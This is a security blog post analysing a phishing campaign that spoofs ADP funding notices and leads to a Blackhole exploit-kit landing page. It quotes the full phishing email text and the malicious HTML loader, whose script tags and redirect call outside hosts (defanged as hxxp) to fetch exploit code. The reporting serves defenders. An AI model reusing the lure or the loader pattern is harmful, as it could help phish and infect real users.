Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits

Sponsored Links

Researchers at MX Lab , has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.


The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′; The above page contains an obfuscated javascript.

  After de-obfuscating the javascript, i found there is Blackhole exploit pack that try to exploit one of the vulnerable software(flash, pdf and other exploits). At the bottom of the page, you can find the applet code that try to exploit the Java Atomic reference vulerability.

Category: /

Share this with Your friends:


About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.